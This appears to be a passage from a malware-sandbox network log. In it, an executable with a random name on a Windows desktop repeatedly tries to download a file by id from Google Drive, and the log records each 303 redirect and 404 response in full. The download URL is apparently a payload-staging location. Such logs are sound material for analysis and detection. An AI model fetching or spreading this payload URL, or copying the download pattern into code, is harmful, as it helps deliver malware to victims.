                                                      Cookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
                                                      2025-01-11 04:07:27 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                      Content-Type: application/binary
                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                      Pragma: no-cache
                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                      Date: Sat, 11 Jan 2025 04:07:27 GMT
                                                      Location: https://drive.usercontent.google.com/download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download
                                                      Strict-Transport-Security: max-age=31536000
                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                      Cross-Origin-Opener-Policy: same-origin
                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                      Content-Security-Policy: script-src 'nonce-m6CZtz06ABA-WArOjegk8g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                      Server: ESF
                                                      Content-Length: 0
                                                      X-XSS-Protection: 0
                                                      X-Frame-Options: SAMEORIGIN
                                                      X-Content-Type-Options: nosniff
                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      Connection: close


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      77 | 192.168.2.11 | 50057 | 142.250.184.225 | 443 | 7988 | C:\Users\user\Desktop\QNuQ5e175D.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      2025-01-11 04:07:28 UTC | 466 | OUT | GET /download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                      Cache-Control: no-cache
                                                      Host: drive.usercontent.google.com
                                                      Connection: Keep-Alive
                                                      Cookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
                                                      2025-01-11 04:07:28 UTC | 1851 | IN | HTTP/1.1 404 Not Found
                                                      X-GUploader-UploadID: AFiumC64WyJRqTNhPVdS5N8OifDmaGtIAIYLPKG8bavWbO6JSjCTV0_G1y5h_i_X902_opA9bpdZFiM
                                                      Content-Type: text/html; charset=utf-8
                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                      Pragma: no-cache
                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                      Date: Sat, 11 Jan 2025 04:07:28 GMT
                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                      Content-Security-Policy: script-src 'nonce-DiNxNwgG5IstDm4PYtmj3Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                      Cross-Origin-Opener-Policy: same-origin
                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                      Content-Length: 1652
                                                      Server: UploadServer
                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      Content-Security-Policy: sandbox allow-scripts
                                                      Connection: close
                                                      2025-01-11 04:07:28 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="QouOnC0I6TmXZ7vA10_UMg">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      78 | 192.168.2.11 | 50058 | 172.217.16.142 | 443 | 7988 | C:\Users\user\Desktop\QNuQ5e175D.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      2025-01-11 04:07:29 UTC | 424 | OUT | GET /uc?export=download&id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                      Host: drive.google.com
                                                      Cache-Control: no-cache
                                                      Cookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
                                                      2025-01-11 04:07:29 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                      Content-Type: application/binary
                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                      Pragma: no-cache
                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                      Date: Sat, 11 Jan 2025 04:07:29 GMT
                                                      Location: https://drive.usercontent.google.com/download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download
                                                      Strict-Transport-Security: max-age=31536000
                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                      Cross-Origin-Opener-Policy: same-origin
                                                      Content-Security-Policy: script-src 'nonce-Yt_zLS7jLut2-kcvmI4h6g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                      Server: ESF
                                                      Content-Length: 0
                                                      X-XSS-Protection: 0
                                                      X-Frame-Options: SAMEORIGIN
                                                      X-Content-Type-Options: nosniff
                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      Connection: close


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      79 | 192.168.2.11 | 50059 | 142.250.184.225 | 443 | 7988 | C:\Users\user\Desktop\QNuQ5e175D.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      2025-01-11 04:07:30 UTC | 466 | OUT | GET /download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                      Cache-Control: no-cache
                                                      Host: drive.usercontent.google.com
                                                      Connection: Keep-Alive
                                                      Cookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
                                                      2025-01-11 04:07:30 UTC | 1844 | IN | HTTP/1.1 404 Not Found
                                                      X-GUploader-UploadID: AFiumC5gx5tENMxP6y0jGxSnbNEmRc2ioje_Sviwoze7Gqxfo8uw1kc5YoJJuVYKMv-1-Yfy
                                                      Content-Type: text/html; charset=utf-8
                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                      Pragma: no-cache
                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                      Date: Sat, 11 Jan 2025 04:07:30 GMT
                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                      Content-Security-Policy: script-src 'nonce-Tp_WFNzdA7p15enucgXJBQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                      Cross-Origin-Opener-Policy: same-origin
                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                      Content-Length: 1652
                                                      Server: UploadServer
                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      Content-Security-Policy: sandbox allow-scripts
                                                      Connection: close
                                                      2025-01-11 04:07:30 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="cFE36IE1lGXb-ENNC7ZJBA">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      80 | 192.168.2.11 | 50060 | 172.217.16.142 | 443 | 7988 | C:\Users\user\Desktop\QNuQ5e175D.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      2025-01-11 04:07:31 UTC | 424 | OUT | GET /uc?export=download&id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                      Host: drive.google.com
                                                      Cache-Control: no-cache
                                                      Cookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
                                                      2025-01-11 04:07:32 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                      Content-Type: application/binary
                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                      Pragma: no-cache
                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                      Date: Sat, 11 Jan 2025 04:07:32 GMT
                                                      Location: https://drive.usercontent.google.com/download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download
                                                      Strict-Transport-Security: max-age=31536000
                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                      Cross-Origin-Opener-Policy: same-origin
                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                      Content-Security-Policy: script-src 'nonce-PGN8oj57yNafE_V2erTvCg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                      Server: ESF
                                                      Content-Length: 0
                                                      X-XSS-Protection: 0
                                                      X-Frame-Options: SAMEORIGIN
                                                      X-Content-Type-Options: nosniff
                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      Connection: close


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      81 | 192.168.2.11 | 50061 | 142.250.184.225 | 443 | 7988 | C:\Users\user\Desktop\QNuQ5e175D.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      2025-01-11 04:07:32 UTC | 466 | OUT | GET /download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                      Cache-Control: no-cache
                                                      Host: drive.usercontent.google.com
                                                      Connection: Keep-Alive
                                                      Cookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
                                                      2025-01-11 04:07:33 UTC | 1844 | IN | HTTP/1.1 404 Not Found
                                                      X-GUploader-UploadID: AFIdbgTVDUZlxEiF4KLvx33QbxYEfqx60jqKpdT9_mqW-Se3q-nktg5riXV9-HnfSwuJYan2
                                                      Content-Type: text/html; charset=utf-8
                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                      Pragma: no-cache
                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                      Date: Sat, 11 Jan 2025 04:07:33 GMT
                                                      Cross-Origin-Opener-Policy: same-origin
                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                      Content-Security-Policy: script-src 'nonce-94ivqguTGv_bpizdqCElcQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                      Content-Length: 1652
                                                      Server: UploadServer
                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      Content-Security-Policy: sandbox allow-scripts
                                                      Connection: close
                                                      2025-01-11 04:07:33 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="_oEKJMItF0ExqTmDqHYCIA">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      82 | 192.168.2.11 | 50062 | 172.217.16.142 | 443 | 7988 | C:\Users\user\Desktop\QNuQ5e175D.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      2025-01-11 04:07:34 UTC | 424 | OUT | GET /uc?export=download&id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                      Host: drive.google.com
                                                      Cache-Control: no-cache
                                                      Cookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
                                                      2025-01-11 04:07:34 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                      Content-Type: application/binary
                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                      Pragma: no-cache
                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                      Date: Sat, 11 Jan 2025 04:07:34 GMT
                                                      Location: https://drive.usercontent.google.com/download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download
                                                      Strict-Transport-Security: max-age=31536000
                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                      Content-Security-Policy: script-src 'nonce-WhZF0H8fiRx1XWd6fjsbug' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                      Cross-Origin-Opener-Policy: same-origin
                                                      Server: ESF
                                                      Content-Length: 0
                                                      X-XSS-Protection: 0
                                                      X-Frame-Options: SAMEORIGIN
                                                      X-Content-Type-Options: nosniff
                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      Connection: close


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      83 | 192.168.2.11 | 50063 | 142.250.184.225 | 443 | 7988 | C:\Users\user\Desktop\QNuQ5e175D.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      2025-01-11 04:07:35 UTC | 466 | OUT | GET /download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                      Cache-Control: no-cache
                                                      Host: drive.usercontent.google.com
                                                      Connection: Keep-Alive
                                                      Cookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
                                                      2025-01-11 04:07:35 UTC | 1851 | IN | HTTP/1.1 404 Not Found
                                                      X-GUploader-UploadID: AFIdbgR44WzFMtJklLZE7-HXmMu3WMgfHx6lgKfkbJbyTzgpthAyeMlE5sOCkcdaGcbczcTpuUHHOc8
                                                      Content-Type: text/html; charset=utf-8
                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                      Pragma: no-cache
                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                      Date: Sat, 11 Jan 2025 04:07:35 GMT
                                                      Cross-Origin-Opener-Policy: same-origin
                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                      Content-Security-Policy: script-src 'nonce-VbidvOdMJnZfCX0n9sGQ0A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                      Content-Length: 1652
                                                      Server: UploadServer
                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      Content-Security-Policy: sandbox allow-scripts
                                                      Connection: close
                                                      2025-01-11 04:07:35 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="k00nPsnmK1n7sqF0fIn26A">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      84 | 192.168.2.11 | 50064 | 172.217.16.142 | 443 | 7988 | C:\Users\user\Desktop\QNuQ5e175D.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      2025-01-11 04:07:36 UTC | 424 | OUT | GET /uc?export=download&id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                      Host: drive.google.com
                                                      Cache-Control: no-cache
                                                      Cookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
                                                      2025-01-11 04:07:36 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                      Content-Type: application/binary
                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                      Pragma: no-cache
                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                      Date: Sat, 11 Jan 2025 04:07:36 GMT
                                                      Location: https://drive.usercontent.google.com/download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download
                                                      Strict-Transport-Security: max-age=31536000
                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                      Content-Security-Policy: script-src 'nonce-aid9MdKqUnJiSa7QiLC5sg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                      Cross-Origin-Opener-Policy: same-origin
                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                      Server: ESF
                                                      Content-Length: 0
                                                      X-XSS-Protection: 0
                                                      X-Frame-Options: SAMEORIGIN
                                                      X-Content-Type-Options: nosniff
                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      Connection: close


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
